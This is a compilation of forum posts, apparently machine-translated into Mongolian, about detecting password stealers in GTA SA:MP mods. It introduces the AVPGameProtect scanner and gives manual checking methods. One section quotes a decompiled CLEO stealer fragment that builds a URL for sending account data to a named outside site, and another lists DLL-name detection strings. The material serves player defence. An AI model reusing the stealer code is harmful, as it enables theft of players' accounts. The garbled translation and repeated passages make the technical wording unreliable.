Анхны ASI styler бүтээгдсэн тэр өдрүүдэд гарч ирсэн хамгийн анхны сканнер. Стиллер гарч ирсний маргааш нь би өөрөө гангийн эсрэг төхөөрөмж боловсруулж эхэлсэн.

Сканнер нь дараахь модулиудыг агуулдаг.
- YARA гарын үсэгтэй хөдөлгүүр (ийм хүчирхэг хэрэгсэл өгсөн Virustotal програмчлалын багт баярлалаа),
- Андреас Жонсоны скрипт хөдөлгүүр (AngelScript), нэг төсөлд ижил төстэй скриптүүдийн хурд, оруулахад хялбар, гоо үзэсгэлэн. Түүний ачаар та CLEO-д зориулсан крипторуудыг хурдан бөгөөд техникийн хувьд нээж чадна.
- CLEO крипторыг маш сайн сурталчлах чадвартай SCM кодын эмулятор (надаас)

Хөтөлбөрийн онцлогууд:
- Ойролцоогоор 2014 оноос хойш өсөн нэмэгдэж буй хулгайч нарын нэлээд том мэдээллийн сан. Бид хэд хэдэн том, тийм ч том биш сайтуудаас хэд хэдэн хортой мод цуглуулсан.
- Програмын цонх руу чирж хавтас, файлуудыг сканнердах боломжтой.
- Дүгнэлт товч мэдээлэлО хортой програм(төрөл, хөгжүүлэгчийн хоч, мэдээллийн сангийн хуучин хувилбарт дистрибьютерийн хоч)
- As, dll, cleo, sf, cs болон бусад боломжуудыг сканнердах аюултай файлууд.
- Өөрчлөгдсөн өргөтгөлтэй файлууд дахь хортой кодыг илрүүлэх, жишээлбэл, хулгайчдыг txd файл болгон нэрлэж, дуудагч ашиглан тоглоом руу ачаалах нь саяхан моод болсон.
- Шифрлэгдсэн CLEO скриптүүдийг задалж, дараа нь сканнердах (энэ нь зөвхөн мэдэгдэж байгаа болон бидний тааралдсан крипторуудын шифрийг тайлдаг гэдгийг тэмдэглэх нь зүйтэй, гэхдээ энэ баримтыг засахад хялбар, зүгээр л бидэнд имэйлээр бичээд файлыг илгээнэ үү). Та задалсан скриптийг сканнердахдаа түүний эх сурвалжийг temp\decrypt.cs файлаас олох боломжтой.
- SCM кодыг шууд дуурайж, скриптийг тайлж, дараа нь хортой код байгаа эсэхийг шалгана уу. (Хэрэв хортой код илэрсэн бол temp\decrypt.cs доторх дампыг харна уу)
- Найрсаг, ойлгомжтой програмын интерфейс.
- Өндөр хурдтайолон тооны файлуудыг шалгах үед сканнердах.
- Олдсон файлыг текст болон зургаан өнцөгт горимоор үзэх боломжтой

Ялангуяа чухал цэг! Тэнэг асуулт асуухгүйн тулд хүн бүр унших хэрэгтэй.
Сканнерыг зохион бүтээсэн зөвхөн архиваас задалсан тоглоомын өөрчлөлтийг шалгахад зориулагдсан, өөр ямар ч тохиолдолд энэ нь ашиггүй!
Тэр ч бас зориулаагүйсуулгагч болон автомат суулгагчид, msi, exe багцууд, pif, mmbak, com, scr, vbs, bat, cmd, js болон тоглоомын горимд олдоогүй бусад аюултай файлуудын хувьд эдгээр файлуудад зориулсан вирусны эсрэг програмууд байдаг!
Мөн Та системийг бүхэлд нь сканнердах ёсгүй, энэ нь ашиггүй бөгөөд утгагүй юм. Энэхүү скан хийгч нь горимоор шалгагдсан бөгөөд зөвхөн загварт зориулагдсан. Та тоглоомын хавтсыг сканнердаж болно, гэхдээ энд та тоглоом нь интернетэд нэвтрэх боломжтой файлуудтай бөгөөд сканнерийн цонхонд харагдахад бэлэн гэдгийг ойлгох хэрэгтэй.

Би үүнийг даруй сануулмаар байна энэ програмбусад антивирус эсвэл сканнер шиг таны бүртгэлийг 100% хамгаалахгүй. Тэд вирусны эсрэг 100% хамгаалалтын нүүрэн дээр бичихэд миний хувьд энэ нь антивирусыг дискнээс устгах дохио юм. Гэхдээ энэ сканнер нь аль хэдийн мэдэгдэж байсан хулгайчдыг шалгах ажлыг хурдасгаж, туршлагагүй дистрибьютерийн өгөөшөнд автахаас зайлсхийхэд тусална.
Ихэнх шилдэг антивирус- Татаж авах эсвэл татахгүй байх нь таны толгой ба шийдвэр. Модуудыг зөвхөн архивын аюулгүй байдлыг хянаж байдаг итгэмжлэгдсэн сайтуудаас татаж аваарай.


Хөтөлбөрийн зохиогч таны шийдвэр, сканнераас алдсан хулгайчдад хариуцлага хүлээхгүй.

Зарим тэмдэгхөтөлбөрүүд:

Анхаар! Интернэт холболт үүсгэж болох файл илэрсэн тул та үүнийг тоглоомонд суулгахаасаа өмнө бодож үзэх хэрэгтэй. Гэхдээ энэ нь скриптийг автоматаар шинэчлэх явдал байж болно. Мөн файлд URL байх боломжтой. Энэ бүхэн таны файлуудыг гараар шалгах чадвараас хамаарна.

CLEO styler олдсон, файлыг задалсан бөгөөд та эх сурвалжийг харах боломжтой.

Сканнер скриптийг задлах гэж оролдсон боловч энэ нь ажиллахгүй байж магадгүй эсвэл хортой код олдсонгүй. Түр хавтас дахь эх сурвалжийг харна уу. Файл шифрлэгдээгүй эсэхийг шалгаарай. Энд та скриптийг гараар шалгах хэрэгтэй.

CLEO-г нээлттэй хэлбэрээр олсон.

Таны компьютерт хортой програм татаж авах файл олдлоо

Дуулиантай төслийн дуугарагч олдлоо

Хамгаалалт олдсон, файл аюул учруулж болзошгүй. Энд та зөвхөн зохиолчийн үнэнч шударга байдал, нэр хүндэд найдах хэрэгтэй. Зохиогчоос файл яагаад шифрлэгдсэн (хамгаалагдсан) болохыг асууж, хариултын хангалттай байдлын талаар өөрөө бодоорой. Энэ файл аюултай байж магадгүй.

Магадгүй файлыг өөр програм хаасан эсвэл файл нь тэг хэмжээтэй байна

Би ийм файлуудыг тоглоомонд оруулахыг зөвлөдөггүй. Эндээс юу ч хүлээж болно. Энэ нь хэд хэдэн файлыг нэг болгож нэгтгэх явдал юм. Эдгээр файлуудын дунд хулгайч эсвэл бусад хортой програм байж магадгүй юм. Цавуунд бүү итгэ. Зөвхөн файл болгон ангилж, файл бүрийг тусад нь шалгаж байж наалт нь аюулгүй эсэхийг баталгаажуулах боломжтой.

Хөтөлбөрийг зөвхөн албан ёсны эх сурвалжаас татаж авахыг танаас хүсье. Энэ нь хамгийн их байх болно аюулгүй сонголт.
Алдааны талаар имэйлээр эсвэл энэ сэдвээр бичнэ үү.


Динамик бүртгэлийг хамгаалахын тулд бид DarkP1xel-ийн тусгай залгаасыг ашиглахыг зөвлөж байна.

Энэ залгаас нь скрипт болон бусад горим дахь аюултай функцуудыг блоклодог.
Хэрэв та энэ залгаасыг тоглоомонд суулгасан бол mods нь гуравдагч талын сервер рүү вэб хүсэлт илгээх боломжгүй бөгөөд энэ нь хулгайчийг санамсаргүйгээр суулгасан байсан ч таны нууц үг буруу гарт орохгүй гэсэн үг юм. тоглоом. Мөн залгаас нь тоглоомын бүх сэжигтэй үйл явдлын нарийвчилсан бүртгэлийг хөтөлдөг. Чухал. Plugin нь байнга шинэчлэгдэж байдаг тул бидэнтэй хамт байгаарай.
p.s: залгаасын төлөө зохиогчид талархахаа бүү мартаарай;)

Бидэнд тусалсан бүх хүмүүст баярлалаа.
Gedwadion, DarkP1xel-д онцгой баярлалаа. Эдгээр нь мэдээллийн технологийн аюулгүй байдлын ирээдүйтэй гайхалтай залуус юм.

Зохиогчид:
smalloff - хөгжил, төслийн дэмжлэг
andre500 - туршилт, төслийн дэмжлэг
Зохиогчийн вэбсайтууд (албан ёсны эх сурвалжууд):вэбсайт, Libertycity.ru
Мэйл: smalloff @ сайт
Програм татаж авах:AVPGameProtect18042019.rar
Хөтөлбөр хөгжүүлэгчийг шар айргаар эмчил (урьдчилан баярлалаа): Yandex шүүгдээгүй

(Анхаар! Олон нийтийн төслийн дэмжлэгийг бүрэн зогсоосон.)

[Чонишвилигийн ноцтой хоолой]:Олон үггүйгээр. Нэвтрүүлгээ хий. Би үүнийг бичиж байх хооронд таны ББ-н вилла болон вилла аль хэдийн мужид нэгдсэн бөгөөд виртуалууд нь халдагч руу шилжсэн байна, аа-ха-ха-ха, ханиалгах ханиалга ханиалгах ханиалгах ханиалгах *бахлагдах*

Cleo файлуудыг сайтад байршуулаагүй тул та хөлөө хөргөж болно. Гэхдээ энэ нь тэднийг Samp-Rp төсөл дээр хориглосон гэсэн үг биш юм. Битгий андуур, хараал ид!
Өөрчлөлтийн бүх шүтэн бишрэгчид "Стиллер" гэсэн ойлголттой танилцсан (Keylogger гэж нэрлэдэг, гэхдээ энэ бол өөр түүх юм). Ихэвчлэн скриптүүд тэдгээрийг одоо ярих болно.

Клео скрипт гэж юу вэ?

Би cleo скрипт гэж юу болохыг тайлбарлахгүй. ерөнхий ойлголт, шууд онлайн тоглоом руу шилжье. SA:MP"a-д зориулсан Cleo-скриптүүд нь тоглоомын тав тухыг сайжруулах зорилготой юм. Тэдгээрийн ачаар та интерфэйсийг өөрт тохируулан өөрчлөх боломжтой. Төрөл бүрийн алдаа, эвдрэл гэх мэтийг засаарай. Гэхдээ хортой (эсвэл хууран мэхлэх) cleo бас байдаг. -скриптүүд (хууран мэхлэлт - англи хэлнээс заль мэх), дашрамд хэлэхэд хатуу байдаг Samp-Rp төсөл дээр хориглосон . Амьдралд гомдсон, сургууль дээрээ зодуулсан хүүхдүүдэд зориулж бүтээжээ. За, та дараах хэллэгийг оруулахгүй байж чадахгүй. "Читс нь Виагра шиг, үүнийг өөрөө хийж чадахгүй хүмүүст зориулсан."
Хамгийн алдартай клео скриптүүд ( .cарслан с cript файлууд) - энэ бол HP тоон үзүүлэлт, дөрвөлжин радар, FPS-ийг нэмэгдүүлдэг скрипт, янз бүрийн хуяг дуулга, эрүүл мэндийн судал (заримдаа эдгээр нь зүгээр л зураас биш, таны дуртай дүр юм. A$AP Роки. HP буурах тусам гэрэл зураг алга болж, зөвхөн дүрс үлдэнэ).
гэсэн асуултад олон хүн зовж байна. яагаад сайт дээр enb цуврал байхгүй байна вэ? Бодит байдал ийм л байна .asiформаттай бол энэ нь зөвхөн эмхэтгэсэн cleo файл юм. Өөрөөр хэлбэл, та үүн дээр загварчлагч оёж болно.
Сайт дээр ямар ч Cleo байхгүй бол яагаад би сэдэв бичиж байна гэж та гайхаж байгаа байх. Гэхдээ энэ нь сайт дээр байхгүй, гэхдээ үүнийг агуулахын тулд та ядаж StreamMemFix1.0 хэрэгтэй .asiЭнэ бол GTA-д зориулсан олон засварын зөвхөн нэг нь бөгөөд үүнд Санаа шахах фен бүр дүүрэн байдаг Андреас загваруудхүчин чадалтай болгож, үүгээрээ чихэр хийдэг. Мөн би c-huds болон бусад өөрчлөлтүүдийн талаар аль хэдийн чимээгүй байна. Та бүртгэлд харамсаж байна уу? Тэгвэл энэ сэдэв танд зориулагдсан болно!

.cs файлыг загварчлагчийг хэрхэн шалгах вэ?

Хамгийн түгээмэл арга бол програмаар дамжуулан шалгах явдал юм Wireshark. Танд хэрэгтэй бүх:

• 1. Програмыг өөрөө татаж аваарай (та үүнийг албан ёсны вэбсайтаас хийж болно).
• 2. Энэ видеог үзээрэй, тэнд бүх зүйлийг тодорхой тайлбарласан болно.
  

=====================================================================================================

Клеог Стиллер байгаа эсэхийг шалгах хоёр дахь арга. IN Хамгийн сүүлийн үеийн хувилбарКлео-номын сангууд ирж байна нэмэлт програмууд, тэдгээрийн нэг нь гэж нэрлэгддэг Нарлаг барилгачин- бидэнд хэрэгтэй зүйл.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__хулгайлах__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - дансны мэдээллийг илгээдэг сайт.
@stealer_by_mg 0 1@ хулгайчийг өөрөө хөгжүүлдэг.

=================================================================================================

Мөн файлыг хулгайч эсэхийг шалгах гуравдахь арга бий. "steal_logger" гэсэн скрипт байна .asi"Бид үүнийг шалгахад ашиглах болно.
(Тийм ээ, тэр өөрөө cleo форматтай, гэхдээ та түүнтэй хамт бааз руу орохгүй бол санаа зовох зүйл байхгүй). Би танд линк өгөхгүй, интернетээс хай.
Би үүнийг хэрхэн ашиглах талаар товч тайлбарлах болно.

• 1. Тоглоомын хавтсанд хийнэ үү.
• 2. Руу явцгаая ямар ч SA:MP сервер, доор ямар чхэн ч биш
• 3. Бид ямар ч нууц үг гаргаж ирээд, нэвтэрч, тоглоомыг хаадаг.
• 4. Үүнийг хавтас дотор үүсгэх ёстой текст файл (.txtформат). Үүн дээр дарж, текстээс бид серверийнхээ IP хаяг, шинээр бүртгүүлсэн дансны нууц үг бүхий мөрийг хайж олох болно. Олдсон - энэ нь хакерт энэ өгөгдөл аль хэдийн байгаа гэсэн үг юм. Ташуур бариад тоглохоор орж ирэхэд нь баярла. Мөн энэ үед бид сүүлчийн cleo файлыг устгаж байна.

[!] Чек болгон ашиглах зөвхөншинээр үүсгэсэн акаунтуудад энэ скриптээр үндсэн бүртгэлдээ нэвтэрч болохгүй. Шалгасны дараа скриптүүдийг шалгахын тулд GTA-г устгах \ эсвэл тусад нь хуулбарлана уу [!]

.asi файл дээр хулгайч байгаа эсэхийг хэрхэн шалгах вэ?

Амархан хэсэг нь дууслаа. Одоо шалгаж сурцгаая .asi-файлууд, учир нь загварчлагч тэдгээрт Wireshark харагдахгүй байна. Юу хийх вэ? Би хамгийн алдартай хэд хэдэн аргыг нийтлэх болно.

Ихэнх үр дүнтэй аргашалгалтууд. Програмаар дамжуулан шалгаж байна IEInspector HTTP анализатор.

===============================================================================================================

Хоёрдахь арга бол тэмдэглэлийн дэвтэр ашиглан кодыг шалгах явдал юм.

• 1. Нээлт .asi Notepad-ээр дамжуулан.
• 2. Кодыг харцгаая.

Цэвэр үед жишээ (No stiler)

Жишээ код илүү тайван(kernel.dll биш)

Сүүлийн мөрүүдэд анхаарлаа хандуулцгаая.

Далд хулгайчдад зориулсан өөр нэг сонголт бол код доторх "urlmon.dll", "wininet.dl l", "wsock32.dll" гэсэн текстэн дэх нэрс юм. Эсвэл мөр " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA АЧИГЧИЙН АЛДАА"

========================================================================================================

"Захиргаа алдагдсан дансаа сэргээдэггүй"- Тэд хэлсэн.
"Бүртгэлийн аюулгүй байдал таны гарт". Энэ сэдвийг уншсаны дараа таны "гар дээш" илүү хүчтэй болсон гэж найдаж байна. Бүртгэлдээ анхаарал тавь.

2015-2015 © Төрөл бүрийн форумаас цуглуулсан.

AVPGameProtectхайлт хийхэд тань туслах програм юм хортой файлуудтоглоомын өөрчлөлтөд. гол онцлогбусад хулгайчдын эсрэг програмууд - бөөнөөр нь сканнердах боломж, өөрөөр хэлбэл та ямар ч файлыг, ямар ч хэмжээгээр сканнердах боломжтой, зүгээр л шилжүүлэх боломжтой. шаардлагатай файлуудэсвэл файл бүхий хавтсыг програмын цонхонд оруулаад сканнерын үр дүнг хүлээнэ үү.

Хөтөлбөрийн онцлогууд:
- 2014 оноос хойш хадгалагдаж байгаа хулгайчдын мэдээллийн томоохон сан.
- asi, dll, cleo, sf, cs болон бусад аюултай файлуудыг сканнердах.
- Олон тооны файлуудыг сканнердах үед өндөр хурдтай.
- Хөтөлбөрийн цонхонд хулгайчийн талаарх мэдээллийг харуулах (хулгайчны төрөл эсвэл хөгжүүлэгчийн хоч).
- Олдсон файлуудыг текст болон зургаан өнцөгт горимоор үзэх боломжтой.
- Интернэттэй харилцах эсвэл файл татаж авах функцийг хайх.
- CLEO скриптийг хулгайч байгаа эсэхийг шалгах (бүгд биш, зөвхөн програмд ​​танигдсан криптортой). Шифрлэгдсэн скрипт нь temp хавтас, програмын үндсэн хавтсанд decrypt.cs нэрээр гарч ирнэ.
- SR_Team болон бусад олон хүмүүсийн FuncCrypt хуулбар.
- Хөтөлбөрийг тасралтгүй дэмжих.

Сканнер нь суулгагч, тоглоомын бүтцийг шалгах, компьютерийг бүрэн скан хийхэд зориулагдаагүй болно. Скан хийхийн тулд та архиваас хавтас эсвэл файл гаргаж аваад програм руу чирэх хэрэгтэй.

Энэ програм нь хэрэглэгчдийг 100% хамгаалдаггүй гэдгийг тэмдэглэх нь зүйтэй. Бусад хулгайч нарын нэгэн адил энэ нь зөвхөн танигдсан хулгайчдыг илрүүлэх зорилготой бөгөөд энэ эсвэл өөр горимыг ашиглах цаашдын шийдвэр нь танд шууд хамаарах бөгөөд зохиогч ТАНЫ шийдвэрт хариуцлага хүлээхгүй. Хөтөлбөрийг байнга шинэчилж байх болно.

Зарим хөтөлбөрийн конвенци:
InetLoader- Анхаар! Интернет холболт үүсгэж болох файл илэрсэн тул татаж авахаасаа өмнө энэ талаар бодох хэрэгтэй. Гэхдээ энэ нь скриптийг автоматаар шинэчлэх явдал байж болно.
CLEO_Хулгайч - CLEO styler олдсон, файлыг задалсан бөгөөд та эх сурвалжийг харах боломжтой.
CLEO_Crypter - Сканнер скриптийг задлах гэж оролдсон, магадгүй энэ нь ажиллахгүй байсан эсвэл хортой код олдсонгүй. Түр хавтас дахь эх сурвалжийг харна уу.
CLEO_Хулгайч- CLEO-г нээлттэй хэлбэрээр оллоо.
Татаж авсан_хулгайч- Таны компьютерт хортой програм татаж авах файл олдсон
Stealers_ru-Нэртэй төслөөс тайруулагч олдсон
Danger_VMProtect- Хамгаалалт олдсон, файл аюул учруулж болзошгүй
Скан хийж чадсангүй - Файлыг өөр програм хаасан эсвэл файлын хэмжээ тэгтэй байна
JoinFiles- Скан хийгч хэд хэдэн файлыг нэгтгэж байгааг оллоо. Эдгээр файлуудын дунд хулгайч эсвэл бусад хортой програм байж магадгүй юм.

Та хулгайчтай тааралдахаас яаж зайлсхийх вэ?!

Stealer нь хортой код бүхий файлыг GTA хавтас руу хуулж суулгадаг скрипт юм. Суулгасны дараа таныг тоглоомын серверт нэвтрэх болгонд энэ нь харилцах цонхонд оруулсан бүх өгөгдлийг (пин код, нууц үг, нууц түлхүүр, өгөгдөл) уншиж, халдагч руу илгээх болно. Тиймээс, скриптийг GTA хавтсанд суулгаснаар та харилцан ярианд зөв өгөгдлийг оруулбал бүх тоглоомын дансаа алдаж болно.

Асаалттай Энэ мөчТөрөл бүрийн Samp серверүүд дээр тоглоомын данс хулгайлах тохиолдол ихсэж байна. Ихэнхдээ эдгээр нь дүрд тоглох горимтой серверүүд байдаг, учир нь тоглоомын валют нь өөрийн гэсэн утгатай байдаг. Халдагчид таны тэнэглэлээс мөнгө олдог. Энэ нийтлэлд би өөрийнхөө мэддэг аргуудыг танд үзүүлэх болно. Эдгээр хулгайчдыг "Идэхгүй бол амьдрахгүй" гэсэн зарчмаар амьдардаг гэдгийг та мэднэ.

Үндсэн зөвлөмжүүд:

1. Тоглож буй төслийнхөө захиргаанаас танд олгосон бүртгэлийг хамгаалах бүх аргыг үргэлж ашиглаарай. (График ПИН код, SMS залгах гэх мэт. Энэ бүхэн серверийн үйл ажиллагаанаас хамаарна).
2. Аль болох урт, нарийн бүтэцтэй нууц үг ашиглах.
3. Бусдад ашигладаг нууц үгээрээ серверт нэвтэрч болохгүй.
4. Дансны мэдээллээ 100% итгэлтэй биш хүнтэй бүү хуваалц.
5. Тоглоомонд янз бүрийн захиалгат өөрчлөлтүүдийг ашиглахыг би танд зөвлөхгүй. Тэд шифрлэгдсэн вирус (Stiller) агуулж болно. Стиллер (англи хэлнээс хулгайлах, хулгайлах) нь тодорхой төрлийн троян (хорлонтой програм, вирус - таны хүссэн зүйл) бөгөөд функц нь системд хадгалагдсан нууц үгийг хулгайлж, "зохиогч" руу илгээхээс бүрддэг.
Та хулгайч горимыг суулгасны дараа тоглоомонд орохдоо нууц үгээ оруулах бөгөөд энэ нь хулгайчийн гарт амжилттай шилжих болно. Ихэнхдээ (Hood, график тохиргоо болон Asi залгаас) зэрэг горимд суулгагдсан байдаг.
6. Вирусны эсрэг програм хэрэглээрэй! Энэ нь танд хадгалсан имэйл эсвэл бүртгэлээ халдвар авсан сайт руу илгээхийг зөвшөөрөхгүй (хулгайч, хулгайчаас хамгаалах (exe)).
7. SA:MP серверийн удирдлага нь хакердсан дансуудыг сэргээдэггүй, алдагдсан мөнгийг буцааж өгөхгүй бөгөөд таны дансны нууц үгийг хэзээ ч асуухгүй.

Эхний арга.

Тэгээд эхний арга нь 100% үр дүнтэй!!!
Хэрэв та янз бүрийн мод, cleo скрипт, хууран мэхлэлтүүдийг татаж авахгүй бол танд ямар ч асуудал гарахгүй бөгөөд хулгайч ТӨЛБӨРГҮЙ!

Вэбсайтаар дамжуулан шалгах:

Эхний арга нь бүх хакердлаас хамгаалах болно, гэхдээ энэ нь хүн бүрт тохиромжгүй.
Тиймээс хоёр дахь арга нь скрипт, янз бүрийн мод, бүрээс, хууран мэхлэлт гэх мэт татаж авдаг хүмүүст тохиромжтой. Тиймээс, надад гарах гарц байгаа ч энэ нь таныг 100% хамгаалахгүй! Файлуудыг шалгадаг сайт янз бүрийн скриптүүд, яг энд . Энэ сайтад зочилсноор та уншиж болно "

Хулгайчдын хамгийн сүүлийн хувилбарууд нь .txd .dff .png .dat форматтай байж болно. Гэхдээ тэдгээр нь .asi .cs .sf залгаасуудаар холбогдсон бөгөөд холболтгүйгээр ажиллахгүй. Тиймээс манай шалгагчийг ашиглан бүх залгаасууд болон скриптүүдийг шалгана уу. Хэрэв танд GTA-д нуугдмал файл байгаа бол устгана уу.

Эндээс бид одоо дуугүй хүмүүс ердийн зургийг mods руу, тэр ч байтугай .png файлд оруулах боломжтой гэж дүгнэж байна. Олон хүн хэлдэг

"Чи хонь юм уу? Эндээс зайл! Би SA:MP тоглоод 5 жил болж байгаа бөгөөд хулгайчид зөвхөн mods эсвэл cleo форматаар л ирдэг гэдгийг би мэднэ!"

Энгийн зураг дээр ч гэсэн бид харж байгаачлан зэвсэг.png залуус байдаггүй, би мэднэ гэж бодъё, магадгүй хулгайч! Бид ямар ч горимыг үргэлж шалгадаг, та хэн нэгэнд яаж итгэх вэ. Тиймээс, бид файлыг шалгах үед, хэрэв энэ нь гарч ирэх бол

Хайлтын үр дүнгийн мэдээлэл:

Хулгайч олдсонгүй:

Файл скан хийх явцад ямар ч хортой код эсвэл сэжигтэй зүйл олдсонгүй. Энэ нь та өөрийн дансанд санаа зовох хэрэггүй гэсэн үг бөгөөд манай шалгагч бүх зүйлийг ашигладаг боломжит аргуудскрипт дэх хортой кодыг илрүүлэх.

Хөтөлбөрийн онцлогууд:
- Ойролцоогоор 2014 оноос хойш өсөн нэмэгдэж буй хулгайч нарын нэлээд том мэдээллийн сан. Бид хэд хэдэн том, тийм ч том биш сайтуудаас хэд хэдэн хортой мод цуглуулсан. Өгөгдсөн дээжийг Gtavicecity.ru сайтад онцгойлон талархаж байна.
- Програмын цонх руу чирж хавтас, файлуудыг сканнердах боломжтой.
- Хортой програмын тухай товч мэдээллийг (төрөл, хөгжүүлэгчийн хоч, дистрибьютерийн мэдээллийн сангийн хуучин хувилбаруудад) харуулна.
- asi, dll, cleo, sf, cs болон бусад аюултай файлуудыг сканнердах.
- Өөрчлөгдсөн өргөтгөлтэй файлууд дахь хортой кодыг илрүүлэх, жишээлбэл, хулгайчдыг txd файл болгон нэрлэж, дуудагч ашиглан тоглоом руу ачаалах нь саяхан моод болсон.
- Шифрлэгдсэн CLEO скриптүүдийг задалж, дараа нь сканнердах (энэ нь зөвхөн мэдэгдэж байгаа болон бидний тааралдсан крипторуудын шифрийг тайлдаг гэдгийг тэмдэглэх нь зүйтэй, гэхдээ энэ баримтыг засахад хялбар, зүгээр л бидэнд имэйлээр бичээд файлыг илгээнэ үү). Та задалсан скриптийг сканнердахдаа түүний эх сурвалжийг temp\decrypt.cs файлаас олох боломжтой.
- SCM кодыг шууд дуурайж, скриптийг тайлж, дараа нь хортой код байгаа эсэхийг шалгана уу. (Хэрэв хортой код илэрсэн бол temp\decrypt.cs доторх дампыг харна уу)
- Найрсаг, ойлгомжтой програмын интерфейс.
- Хөтөлбөрийн маш энгийн ойлголт бөгөөд энэ нь амархан бөгөөд байнга шинэчлэгдэх боломжтой гэсэн үг юм.
- Олон тооны файлуудыг сканнердах үед скан хийх өндөр хурд.
- Олдсон файлыг текст болон зургаан өнцөгт горимоор үзэх боломжтой

Сканнер нь зөвхөн архиваас задалсан тоглоомын өөрчлөлтийг шалгахад зориулагдсан бөгөөд бусад тохиолдолд энэ нь ашиггүй болно.
Энэ нь мөн суулгагч болон автомат суулгагчдад зориулагдаагүй болно.

АНХААР!!!
Энэ програм нь бусад вирусны эсрэг эсвэл сканнер шиг таны дансыг 100% хамгаалахгүй гэдгийг би даруй сануулмаар байна. Тэд вирусны эсрэг 100% хамгаалалтын нүүрэн дээр бичихэд миний хувьд энэ нь антивирусыг дискнээс устгах дохио юм. Гэхдээ энэ сканнер нь аль хэдийн мэдэгдэж байсан хулгайчдыг шалгах ажлыг хурдасгаж, туршлагагүй дистрибьютерийн өгөөшөнд автахаас зайлсхийхэд тусална.
Шилдэг антивирус бол таны толгой ба шийдвэр юм - татаж авах эсвэл татаж авахгүй байх. Модуудыг зөвхөн архивын аюулгүй байдлыг хянаж байдаг итгэмжлэгдсэн сайтуудаас татаж аваарай.

Зарим хөтөлбөрийн конвенци:

ХӨГЖИЖ БАЙНА

HttpAnalyzer бол сүлжээний хөдөлгөөний анализатор юм. Хэрэв та HTTP болон HTTPS траффикийг бодит цаг хугацаанд хянах зорилготой функциональ хэрэгсэл хайж байгаа бол энэ програм танд таалагдах ёстой гэж бодож байна, энэ бол холболтын талаар шаардлагатай бүх мэдээллийг тодорхой харуулах нэг төрлийн үнэрлэгч юм!

Ер нь HTTP Analyzer маш олон зүйлийг хийж чадна, албан ёсны вэб сайтаас илүү дэлгэрэнгүй уншиж болно гэж бодож байна, би гол санаагаа бичсэн.